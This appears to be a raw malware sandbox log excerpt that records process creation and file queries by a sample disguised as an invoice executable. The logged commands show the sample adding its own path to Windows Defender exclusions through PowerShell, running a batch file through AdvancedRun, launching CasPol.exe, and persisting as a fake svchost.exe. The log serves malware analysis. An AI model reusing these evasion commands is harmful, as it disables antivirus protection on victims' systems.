        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Process created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
        Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknown Process created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknown Process created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Process created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: explorer.exe, 0000000B.00000002.916880839.0000000001350000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.943989994.0000000002E8E000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.928674175.0000000001020000.00000002.00000001.sdmp Binary or memory string: Program Manager
        Source: explorer.exe, 0000000B.00000002.916880839.0000000001350000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.933373358.0000000001260000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.928674175.0000000001020000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
        Source: explorer.exe, 0000000B.00000002.916880839.0000000001350000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.933373358.0000000001260000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.928674175.0000000001020000.00000002.00000001.sdmp Binary or memory string: Progman
        Source: CasPol.exe, 0000000D.00000002.941774576.0000000002CF8000.00000004.00000001.sdmp Binary or memory string: Program Managerx
        Source: explorer.exe, 0000000B.00000002.916880839.0000000001350000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.933373358.0000000001260000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.928674175.0000000001020000.00000002.00000001.sdmp Binary or memory string: Progmanlock
        Source: CasPol.exe, 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp Binary or memory string: Program Manager`
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Queries volume information: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
